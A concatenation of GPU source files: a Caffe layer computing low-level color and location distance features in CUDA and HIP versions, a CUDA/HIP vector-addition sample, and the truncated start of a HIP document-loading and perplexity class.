LowlevelDistanceLayer<Dtype>::Forward_gpu(const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) { // bottom[0] : data, bottom[1] : slic_index, bottom[2] : dead map // bottom[3] : label_map // Prepare various channel data and gabor filtered map // data blob to Mat CHECK_EQ(bottom[0]->shape(1), 3); const int mcs_channels = 9; Blob<Dtype> mcs_data(N_, mcs_channels, H_, W_); // multi colorspaces data generate_multicolor_data(*bottom[0], &mcs_data); // Calculate grid features int block_cnt = N_ * grid_size_ * grid_size_; Handcrafted* grid_fptr = grid_features_.mutable_gpu_data(); const Dtype* mcs_gpu_ptr = mcs_data.mutable_gpu_data(); hipLaunchKernelGGL(( CalculateGridFeatures), dim3(CAFFE_GET_BLOCKS(block_cnt)), dim3(CAFFE_CUDA_NUM_THREADS), 0, 0, block_cnt, grid_size_, N_, mcs_channels, H_, W_, mcs_gpu_ptr, grid_fptr); // Select R regions per an image for training PickQueryRegions(bottom[2]); // Calculate query features and its label // N * R block_cnt = N_ * R_ * mcs_channels; int slic_xdim = bottom[2]->shape(3); int slic_ydim = bottom[2]->shape(2); const Dtype* labelmap_ptr = NULL; if (bottom.size() > 3) { labelmap_ptr = bottom[3]->gpu_data(); } const Dtype* slic_idx_ptr = bottom[1]->gpu_data(); const float* query_idx_ptr = query_region_indexes_.gpu_data(); Handcrafted* query_fptr = query_features_.mutable_gpu_data(); Dtype* label_output = NULL; Dtype* query_output = NULL; if (top.size() > 1) { label_output = top[1]->mutable_gpu_data(); //printf("clear1\n"); query_output = top[2]->mutable_gpu_data(); } //printf("clear2\n"); hipLaunchKernelGGL(( CalculateRegionFeatures), dim3(CAFFE_GET_BLOCKS(block_cnt)), dim3(CAFFE_CUDA_NUM_THREADS), 0, 0, block_cnt, N_, mcs_channels, H_, W_, R_, slic_xdim, slic_ydim, sp_size_, mcs_gpu_ptr, labelmap_ptr, slic_idx_ptr, query_idx_ptr, query_fptr, label_output, query_output); // Calculate low level distance const Handcrafted* updated_grid_fptr = grid_features_.gpu_data(); const Handcrafted* updated_query_fptr = query_features_.gpu_data(); hipLaunchKernelGGL(( CalculateDistanceBetweenQueryAndGrid), dim3(CAFFE_GET_BLOCKS(block_cnt)), dim3(CAFFE_CUDA_NUM_THREADS), 0, 0, block_cnt, N_, R_, mcs_channels, H_, W_, grid_size_, dim_output_, updated_grid_fptr, updated_query_fptr, top[0]->mutable_gpu_data(), hf_option_); /* const Dtype* check = top[0]->cpu_data(); int n = 0; for (int c = 0; c < 29; c++) { for (int i = 0; i < 18; i++) { for (int j = 0; j < 18; j ++) { cout << *(check + (((n * R_ + 1)* dim_output_ + c)*18 + i) *18 + j) << ", "; } cout << endl; } cout << "------------------------------------------" << endl; } cout << "============================================" << endl; */ } INSTANTIATE_LAYER_GPU_FUNCS(LowlevelDistanceLayer); } // namespace caffe
4ae4d817aeba51488562dce2a1e5f6feede2c4e5.cu
#include <iostream> #include <cstdio> #include <opencv2/core/core.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> #include <boost/chrono.hpp> #include "caffe/layers/lowlevel_distance_layer.hpp" using std::cout; using std::endl; using cv::Mat; namespace caffe { // Calculate Grid features template <typename Dtype> __global__ void CalculateGridFeatures(const int nthreads, const int grid_size, const int num, const int channels, const int height, const int width, const Dtype* const data, Handcrafted* grid_features) { CUDA_KERNEL_LOOP(index, nthreads) { const int n = index / (grid_size * grid_size); const int grid_index = index % (grid_size * grid_size); const int grid_x = grid_index % grid_size; const int grid_y = grid_index / grid_size; const int output_idx = (n * grid_size + grid_y) * grid_size + grid_x; const int x_start = grid_x * (width / grid_size); const int x_end = (grid_x + 1) * (width / grid_size) - 1; const int y_start = grid_y * (height / grid_size); const int y_end = (grid_y + 1) * (height / grid_size) - 1; float color_mean[10] = {0}; float color_histo[10][8] = {0}; // collect features for (int c = 0; c < channels; c++) { // (0, 1, 2) : 0-mean normalized BGR data const Dtype* data_slice = data + (n * channels + c) * height * width; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { color_mean[c] += data_slice[y * width + x]; // Bin size : 256 / 8 = 32 int bin_idx = data_slice[y * width + x] / 32; color_histo[c][bin_idx] += 1; } } color_mean[c] /= ((width / grid_size) * (height / grid_size)); for (int j = 0; j < 8; j++) { color_histo[c][j] /= ((width / grid_size) * (height / grid_size)); } } Handcrafted* current_hc = &(grid_features[output_idx]); for (int i = 0; i < channels; i++) { current_hc->color_mean[i] = color_mean[i]; for (int j = 0; j < 8; j++) { current_hc->color_histogram[i][j] = color_histo[i][j]; } } current_hc->center_location[0] = (y_start + y_end) / 2.0; current_hc->center_location[1] = (x_start + x_end) / 2.0; } } // Calculate Region features and label template <typename Dtype> __global__ void CalculateRegionFeatures(const int nthreads, const int num, const int channels, const int height, const int width, const int R, const int slic_xdim, const int slic_ydim, const int spixel_size, const Dtype* const data, const Dtype* const label_map, const Dtype* const slic_index_data, const float* const query_indexes, Handcrafted* query_features, Dtype* label_output, Dtype* query_output) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; const int query_sp_idx = query_indexes[index]; const int slic_yind = query_sp_idx / slic_xdim; const int slic_xind = query_sp_idx % slic_xdim; const int x_start = max((slic_xind - 2) * spixel_size, 0); const int x_end = min((slic_xind + 2) * spixel_size, width); const int y_start = max((slic_yind - 2) * spixel_size, 0); const int y_end = min((slic_yind + 2) * spixel_size, height); float color_mean = 0; float color_histo[8] = {0}; float center_x = 0; float center_y = 0; if (label_map != NULL && current_channel == 0) { int count = 0; label_output[index] = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { label_output[index] += label_map[(n * height + y) * width + x]; count += 1; } } } if (count != 0) { label_output[index] /= count; } else { label_output[index] = 255; } } // 
copy index in order to synchronize depth current and mcs current query_output[index] = query_indexes[index]; const Dtype* data_slice = data + (n * channels + current_channel) * height * width; int count = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { //printf("slic_index_data : %f \n", slic_index_data[(n * height + y) * width + x]); // printf("(n * height + y) * width + x : %d \n", // (n * height + y) * width + x); //printf("query_sp_idx : %d \n", query_sp_idx); // printf("data_slice : %f \n", data_slice[y * width + x]); count += 1; color_mean += data_slice[y * width + x]; int bin_idx = data_slice[y * width + x] / 32; color_histo[bin_idx] += 1; if (current_channel == 0) { center_x += x; center_y += y; } } } } if (count == 0) { count = 1; } color_mean /= count; if (current_channel == 0) { center_x /= count; center_y /= count; } for (int j = 0; j < 8; j++) { color_histo[j] /= count; } Handcrafted* current_hc = &(query_features[index]); for (int i = 0; i < channels; i++) { current_hc->color_mean[current_channel] = color_mean; for (int j = 0; j < 8; j++) { current_hc->color_histogram[current_channel][j] = color_histo[j]; } } if (current_channel == 0) { current_hc->center_location[0] = center_y; current_hc->center_location[1] = center_x; } } } __device__ inline int GetOffset(const int n, const int c, const int h, const int w, const int C, const int H, const int W) { return (((n * C + c) * H + h) * W + w); } // Calculate distance between query and grid features template <typename Dtype> __global__ void CalculateDistanceBetweenQueryAndGrid(const int nthreads, const int N, const int R, const int channels, const int height, const int width, const int grid_size, const int dim_output, const Handcrafted* grid_features, const Handcrafted* query_features, Dtype* const top_data, int option) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; //const int r = index % R; const Handcrafted* sliced_grid_features = &(grid_features[n * grid_size * grid_size]); const Handcrafted* current_query_features = &(query_features[index]); for (int gx = 0; gx < grid_size; gx++) { for (int gy = 0; gy < grid_size; gy++) { int grid_index = gy * grid_size + gx; int chidx = current_channel * (dim_output - 2) / channels; // top channel index // BGR color difference float grid_val = sliced_grid_features[grid_index].color_mean[current_channel]; float query_val = current_query_features->color_mean[current_channel]; if (option != 1) { // Query region val *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = query_val/256 - 0.5; //printf("mcs_query_val: %f \n", query_val/256 - 0.5); chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = grid_val/256 - 0.5; //printf("mcs_query_val: %f \n", grid_val/256 - 0.5); chidx += 1; } if (option == 0) { // histogram for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp1; chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp2; chidx += 1; } } else if (option == 3) { float sum = 0; for (int b = 0; b < 8; b++) { float tmp1 = 
sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; sum += 2 * (tmp1 - tmp2) * (tmp1 - tmp2) / (tmp1 + tmp2 + 0.00000001); } *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = sum / 4.0; chidx += 1; } if (current_channel == channels - 1) { // Location difference *(top_data + GetOffset(index, dim_output - 2, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[0] - current_query_features->center_location[0])/(height/2); *(top_data + GetOffset(index, dim_output - 1, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[1] - current_query_features->center_location[1])/(width/2); } } } } } // Pick R regions to query template<typename Dtype> void LowlevelDistanceLayer<Dtype>::PickQueryRegions(const Blob<Dtype>* dead_spmap) { int N = dead_spmap->shape(0); int map_h = dead_spmap->shape(2); int map_w = dead_spmap->shape(3); //printf("R_ : %d \n", R_); //printf("map_w * map_h * N : %d \n", map_w * map_h * N); if (R_ == map_w * map_h * N) { // test phase. query all regions float* qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int i = 0; i < R_; i++) { *qindx_ptr = i; qindx_ptr += query_region_indexes_.offset(0, 1); } } else { float* const qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int n = 0; n < N; n++) { vector<float> candidates; // Pick R regions const Dtype* dead_spmap_ptr = dead_spmap->cpu_data() + dead_spmap->offset(n); for (int w = 0; w < map_w; w++) { for (int h = 0; h < map_h; h++) { bool is_dead = (dead_spmap_ptr[dead_spmap->offset(0, 0, h, w)] == 1); if (!is_dead) { candidates.push_back(h*map_w + w); } } } // randomly pick R superpixels std::random_shuffle(candidates.begin(), candidates.end()); for (int r = 0; r < R_; r++) { qindx_ptr[query_region_indexes_.offset(n, r)] = candidates[r]; } } } } template<typename Dtype> void generate_multicolor_data(const Blob<Dtype>& data, Blob<Dtype>* const mcs_data) { const Dtype* data_cpu = data.cpu_data(); Dtype* mcs_data_cpu_ptr = mcs_data->mutable_cpu_data(); int num = data.shape(0); int channels = data.shape(1); int height = data.shape(2); int width = data.shape(3); int mcs_channels = mcs_data->shape(1); const unsigned char MEAN[3] = {104, 117, 123}; cv::Mat bgr_mat(height, width, CV_8UC3); cv::Mat hsv_mat; cv::Mat lab_mat; for (int n = 0; n < num; n++) { for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { bgr_mat.at<cv::Vec3b>(h, w)[c] = static_cast<unsigned char>( data_cpu[((n * channels + c) * height + h) * width + w] + MEAN[c]); } } } cv::cvtColor(bgr_mat, hsv_mat, CV_BGR2HSV); cv::cvtColor(bgr_mat, lab_mat, CV_BGR2Lab); // convert to blob for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { mcs_data_cpu_ptr[((n * mcs_channels + c) * height + h) * width + w] = static_cast<float>(bgr_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 3) * height + h) * width + w] = static_cast<float>(hsv_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 6) * height + h) * width + w] = static_cast<float>(lab_mat.at<cv::Vec3b>(h, w)[c]); } } } } } // --------------------------------------------------- // // Caffe forward implementation // // --------------------------------------------------- template <typename Dtype> void LowlevelDistanceLayer<Dtype>::Forward_gpu(const 
vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) { // bottom[0] : data, bottom[1] : slic_index, bottom[2] : dead map // bottom[3] : label_map // Prepare various channel data and gabor filtered map // data blob to Mat CHECK_EQ(bottom[0]->shape(1), 3); const int mcs_channels = 9; Blob<Dtype> mcs_data(N_, mcs_channels, H_, W_); // multi colorspaces data generate_multicolor_data(*bottom[0], &mcs_data); // Calculate grid features int block_cnt = N_ * grid_size_ * grid_size_; Handcrafted* grid_fptr = grid_features_.mutable_gpu_data(); const Dtype* mcs_gpu_ptr = mcs_data.mutable_gpu_data(); CalculateGridFeatures<<<CAFFE_GET_BLOCKS(block_cnt), CAFFE_CUDA_NUM_THREADS>>>(block_cnt, grid_size_, N_, mcs_channels, H_, W_, mcs_gpu_ptr, grid_fptr); // Select R regions per an image for training PickQueryRegions(bottom[2]); // Calculate query features and its label // N * R block_cnt = N_ * R_ * mcs_channels; int slic_xdim = bottom[2]->shape(3); int slic_ydim = bottom[2]->shape(2); const Dtype* labelmap_ptr = NULL; if (bottom.size() > 3) { labelmap_ptr = bottom[3]->gpu_data(); } const Dtype* slic_idx_ptr = bottom[1]->gpu_data(); const float* query_idx_ptr = query_region_indexes_.gpu_data(); Handcrafted* query_fptr = query_features_.mutable_gpu_data(); Dtype* label_output = NULL; Dtype* query_output = NULL; if (top.size() > 1) { label_output = top[1]->mutable_gpu_data(); //printf("clear1\n"); query_output = top[2]->mutable_gpu_data(); } //printf("clear2\n"); CalculateRegionFeatures<<<CAFFE_GET_BLOCKS(block_cnt), CAFFE_CUDA_NUM_THREADS>>>(block_cnt, N_, mcs_channels, H_, W_, R_, slic_xdim, slic_ydim, sp_size_, mcs_gpu_ptr, labelmap_ptr, slic_idx_ptr, query_idx_ptr, query_fptr, label_output, query_output); // Calculate low level distance const Handcrafted* updated_grid_fptr = grid_features_.gpu_data(); const Handcrafted* updated_query_fptr = query_features_.gpu_data(); CalculateDistanceBetweenQueryAndGrid<<<CAFFE_GET_BLOCKS(block_cnt), CAFFE_CUDA_NUM_THREADS>>>(block_cnt, N_, R_, mcs_channels, H_, W_, grid_size_, dim_output_, updated_grid_fptr, updated_query_fptr, top[0]->mutable_gpu_data(), hf_option_); /* const Dtype* check = top[0]->cpu_data(); int n = 0; for (int c = 0; c < 29; c++) { for (int i = 0; i < 18; i++) { for (int j = 0; j < 18; j ++) { cout << *(check + (((n * R_ + 1)* dim_output_ + c)*18 + i) *18 + j) << ", "; } cout << endl; } cout << "------------------------------------------" << endl; } cout << "============================================" << endl; */ } INSTANTIATE_LAYER_GPU_FUNCS(LowlevelDistanceLayer); } // namespace caffe
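// The kernels in the layer above index their work with Caffe's CUDA_KERNEL_LOOP
// macro and size their launches with CAFFE_GET_BLOCKS / CAFFE_CUDA_NUM_THREADS,
// none of which are defined in this file. The sketch below shows the
// conventional grid-stride pattern those helpers expand to; treat the thread
// count and macro body as assumptions, not the exact definitions used here.
#include <cuda_runtime.h>

const int kNumThreadsSketch = 512;  // assumed threads per block

inline int GetBlockCountSketch(const int n) {
  // enough blocks to cover n items, one item per thread per pass
  return (n + kNumThreadsSketch - 1) / kNumThreadsSketch;
}

// Grid-stride loop: each thread handles i, i + stride, i + 2*stride, ...
#define KERNEL_LOOP_SKETCH(i, n)                          \
  for (int i = blockIdx.x * blockDim.x + threadIdx.x;     \
       i < (n);                                           \
       i += blockDim.x * gridDim.x)

__global__ void ScaleKernelSketch(const int n, const float alpha, float* data) {
  KERNEL_LOOP_SKETCH(index, n) {
    data[index] *= alpha;  // same traversal pattern as the feature kernels above
  }
}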
b2a6e599080fe83030f5fea837292147d0de6e9b.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
#include "device_launch_parameters.h"
#include <stdio.h>
#include <iostream>
#include "../HighPerformanceTimer/HighPerformanceTimer.h"

hipError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size);

__global__ void addKernel(int *c, const int *a, const int *b)
{
    int i = threadIdx.x;
    c[i] = a[i] + b[i];
}

int main()
{
    const int arraySize = 5;
    const int a[arraySize] = { 1, 2, 3, 4, 5 };
    const int b[arraySize] = { 10, 20, 30, 40, 50 };
    int c[arraySize] = { 0 };

    HighPrecisionTime h;

    try {
        // Add vectors in parallel.
        h.TimeSinceLastCall();
        hipError_t cudaStatus = addWithCuda(c, a, b, arraySize);
        double t = h.TimeSinceLastCall();
        std::cout << t << std::endl;
        if (cudaStatus != hipSuccess) {
            //fprintf(stderr, "addWithCuda failed!");
            //return 1;
            throw("addWithCuda failed!");
        }

        printf("{1,2,3,4,5} + {10,20,30,40,50} = {%d,%d,%d,%d,%d}\n",
            c[0], c[1], c[2], c[3], c[4]);

        // hipDeviceReset must be called before exiting in order for profiling and
        // tracing tools such as Nsight and Visual Profiler to show complete traces.
        cudaStatus = hipDeviceReset();
        if (cudaStatus != hipSuccess) {
            //fprintf(stderr, "hipDeviceReset failed!");
            //return 1;
            throw("hipDeviceReset failed!");
        }
    }
    // The string literals thrown above have type const char*, so the handler
    // must be const-qualified to match them.
    catch (const char* error_message) {
        std::cout << error_message << std::endl;
    }

#if defined(_WIN32) || defined(_WIN64)
    system("pause");
#endif

    return 0;
}

// Helper function for using CUDA to add vectors in parallel.
hipError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size)
{
    int *dev_a = 0;
    int *dev_b = 0;
    int *dev_c = 0;
    hipError_t cudaStatus;

    // Choose which GPU to run on, change this on a multi-GPU system.
    cudaStatus = hipSetDevice(0);
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipSetDevice failed! Do you have a CUDA-capable GPU installed?");
        goto Error;
    }

    // Allocate GPU buffers for three vectors (two input, one output).
    cudaStatus = hipMalloc((void**)&dev_c, size * sizeof(int));
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipMalloc failed!");
        goto Error;
    }

    cudaStatus = hipMalloc((void**)&dev_a, size * sizeof(int));
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipMalloc failed!");
        goto Error;
    }

    cudaStatus = hipMalloc((void**)&dev_b, size * sizeof(int));
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipMalloc failed!");
        goto Error;
    }

    // Copy input vectors from host memory to GPU buffers.
    cudaStatus = hipMemcpy(dev_a, a, size * sizeof(int), hipMemcpyHostToDevice);
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipMemcpy failed!");
        goto Error;
    }

    cudaStatus = hipMemcpy(dev_b, b, size * sizeof(int), hipMemcpyHostToDevice);
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipMemcpy failed!");
        goto Error;
    }

    // Launch a kernel on the GPU with one thread for each element.
    hipLaunchKernelGGL(( addKernel), dim3(1), dim3(size), 0, 0, dev_c, dev_a, dev_b);

    // Check for any errors launching the kernel.
    cudaStatus = hipGetLastError();
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "addKernel launch failed: %s\n", hipGetErrorString(cudaStatus));
        goto Error;
    }

    // hipDeviceSynchronize waits for the kernel to finish, and returns
    // any errors encountered during the launch.
    cudaStatus = hipDeviceSynchronize();
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus);
        goto Error;
    }

    // Copy output vector from GPU buffer to host memory.
    cudaStatus = hipMemcpy(c, dev_c, size * sizeof(int), hipMemcpyDeviceToHost);
    if (cudaStatus != hipSuccess) {
        fprintf(stderr, "hipMemcpy failed!");
        goto Error;
    }

Error:
    hipFree(dev_c);
    hipFree(dev_a);
    hipFree(dev_b);

    return cudaStatus;
}
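// The launch in addWithCuda above uses the macro form hipify-perl emits,
// including the stray parentheses it leaves around the kernel name. Below is a
// hand-cleaned sketch of the same launch; the kernel and argument names are
// reused from the file above, and this is an equivalent spelling rather than
// part of that file.
#include <hip/hip_runtime.h>

__global__ void addKernel(int *c, const int *a, const int *b);  // declared in the file above

static void launchAddSketch(int *dev_c, const int *dev_a, const int *dev_b, unsigned int size)
{
    // hipLaunchKernelGGL(kernel, gridDim, blockDim, dynamicSharedBytes, stream, args...)
    hipLaunchKernelGGL(addKernel, dim3(1), dim3(size), 0, 0, dev_c, dev_a, dev_b);
    // hipcc also accepts the original CUDA triple-chevron spelling:
    // addKernel<<<1, size>>>(dev_c, dev_a, dev_b);
}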
b2a6e599080fe83030f5fea837292147d0de6e9b.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <iostream> #include "../HighPerformanceTimer/HighPerformanceTimer.h" cudaError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size); __global__ void addKernel(int *c, const int *a, const int *b) { int i = threadIdx.x; c[i] = a[i] + b[i]; } int main() { const int arraySize = 5; const int a[arraySize] = { 1, 2, 3, 4, 5 }; const int b[arraySize] = { 10, 20, 30, 40, 50 }; int c[arraySize] = { 0 }; HighPrecisionTime h; try { // Add vectors in parallel. h.TimeSinceLastCall(); cudaError_t cudaStatus = addWithCuda(c, a, b, arraySize); double t = h.TimeSinceLastCall(); std::cout << t << std::endl; if (cudaStatus != cudaSuccess) { //fprintf(stderr, "addWithCuda failed!"); //return 1; throw("addWithCuda failed!"); } printf("{1,2,3,4,5} + {10,20,30,40,50} = {%d,%d,%d,%d,%d}\n", c[0], c[1], c[2], c[3], c[4]); // cudaDeviceReset must be called before exiting in order for profiling and // tracing tools such as Nsight and Visual Profiler to show complete traces. cudaStatus = cudaDeviceReset(); if (cudaStatus != cudaSuccess) { //fprintf(stderr, "cudaDeviceReset failed!"); //return 1; throw("cudaDeviceReset failed!"); } } catch (char* error_message) { std::cout << error_message << std::endl; } #ifdef _WIN32 || _WIN64 system("pause"); #endif return 0; } // Helper function for using CUDA to add vectors in parallel. cudaError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size) { int *dev_a = 0; int *dev_b = 0; int *dev_c = 0; cudaError_t cudaStatus; // Choose which GPU to run on, change this on a multi-GPU system. cudaStatus = cudaSetDevice(0); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaSetDevice failed! Do you have a CUDA-capable GPU installed?"); goto Error; } // Allocate GPU buffers for three vectors (two input, one output) . cudaStatus = cudaMalloc((void**)&dev_c, size * sizeof(int)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; } cudaStatus = cudaMalloc((void**)&dev_a, size * sizeof(int)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; } cudaStatus = cudaMalloc((void**)&dev_b, size * sizeof(int)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; } // Copy input vectors from host memory to GPU buffers. cudaStatus = cudaMemcpy(dev_a, a, size * sizeof(int), cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } cudaStatus = cudaMemcpy(dev_b, b, size * sizeof(int), cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } // Launch a kernel on the GPU with one thread for each element. addKernel<<<1, size>>>(dev_c, dev_a, dev_b); // Check for any errors launching the kernel cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); goto Error; } // cudaDeviceSynchronize waits for the kernel to finish, and returns // any errors encountered during the launch. cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus); goto Error; } // Copy output vector from GPU buffer to host memory. 
cudaStatus = cudaMemcpy(c, dev_c, size * sizeof(int), cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } Error: cudaFree(dev_c); cudaFree(dev_a); cudaFree(dev_b); return cudaStatus; }
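// addWithCuda above repeats the same status check after every runtime call. A
// common way to compress that pattern is a checking macro; this is a sketch of
// one such macro, not something the file above defines, and unlike the
// goto-based version an early return skips the cudaFree cleanup.
#include <cstdio>
#include <cuda_runtime.h>

#define CUDA_TRY_SKETCH(call)                                               \
  do {                                                                      \
    cudaError_t err__ = (call);                                             \
    if (err__ != cudaSuccess) {                                             \
      std::fprintf(stderr, "%s failed at %s:%d: %s\n", #call, __FILE__,     \
                   __LINE__, cudaGetErrorString(err__));                    \
      return err__; /* propagate instead of goto Error; no cleanup here */  \
    }                                                                       \
  } while (0)

// Usage inside a function returning cudaError_t, mirroring addWithCuda:
//   CUDA_TRY_SKETCH(cudaSetDevice(0));
//   CUDA_TRY_SKETCH(cudaMalloc((void**)&dev_c, size * sizeof(int)));
//   CUDA_TRY_SKETCH(cudaMemcpy(dev_a, a, size * sizeof(int), cudaMemcpyHostToDevice));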
b6a89695e4ad878373ae2ecee66150d6518b26d6.hip
// !!! This is a file automatically generated by hipify!!! #include "Doc.cuh" Document::Document(string argFilePrefix, int argNumChunks, int argMaxTLLength, int argmaxDocLength, int argWordLength, int argNumGPUs) { filePrefix = argFilePrefix; numChunks = argNumChunks; maxTLLength = argMaxTLLength; maxDocLength = argmaxDocLength; wordLength = argWordLength; numGPUs = argNumGPUs; perplexityMid = new float[GridDim*BlockDim / 32]; //perplexityMid2 = new float[GridDim*BlockDim / 32]; perplexity = new float[maxTLLength]; } void Document::loadDocument() { TLLengthVec = new int[numChunks]; docLengthVec = new int[numChunks]; numOfTokenVecD = new int[numChunks]; numOfTokenVecS = new int[numChunks]; ifstream docLength((filePrefix + string("/docLength.txt")).c_str(), ios::binary);//store max Doc and DT length ifstream TLLength((filePrefix + string("/TLLength.txt")).c_str(), ios::binary); ifstream TLSplit((filePrefix + string("/TLSplit.txt")).c_str(), ios::binary); for (int chunkId = 0; chunkId < numChunks; chunkId++) { TLLength >> TLLengthVec[chunkId]; docLength >> docLengthVec[chunkId]; TLSplit >> numOfTokenVecD[chunkId] >> numOfTokenVecS[chunkId]; DocChunk tmpDocChunk(TLLengthVec[chunkId], docLengthVec[chunkId], wordLength); tmpDocChunk.CPUMemSet(); tmpDocChunk.loadChunk(filePrefix, chunkId); docChunkVec.push_back(tmpDocChunk); } printf("All chunks loaded!"); docLength.close(); TLLength.close(); } void Document::InitGPU() { for (int GPUId = 0; GPUId < numGPUs; GPUId++) { GPUChunk ChunkGPU(maxTLLength, maxDocLength, wordLength); ChunkGPU.GPUMemAllocate(GPUId); GPUChunkVec.push_back(ChunkGPU); } } void Document::CPU2GPUPerplexity(int argGPUId) { hipSetDevice(argGPUId); memset(perplexityMid, 0, GridDim*BlockDim / 32 * sizeof(float)); //memset(perplexityMid2, 0, GridDim*BlockDim / 32 * sizeof(float)); hipMemcpy(GPUChunkVec[argGPUId].devicePerplexityMid, perplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyHostToDevice); hipMemset(GPUChunkVec[argGPUId].devicePerplexity,0,maxTLLength*sizeof(float)); } void Document::GPU2CPUPerplexity(int argGPUId) { //hipSetDevice(argGPUId); //if (argGPUId == 0) { // hipMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //} // //else { // hipMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //} // ///*hipMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), hipMemcpyDeviceToHost);*/ //sumPerplexity = 0.0; //if (argGPUId == 0) { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid[i] / 467723.0; // } //} //else { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid2[i] / 467723.0; // } //} // //printf("Parallel Perplexity:%f \n", sumPerplexity); hipSetDevice(argGPUId); hipMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //else { // hipMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //} /*hipMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), hipMemcpyDeviceToHost);*/ sumPerplexity = 0.0; for (int i = 0; i < GridDim*BlockDim / 32; i++) { // printf("Perplexity:%f \n", h_PerplexityMid[i]); sumPerplexity += 
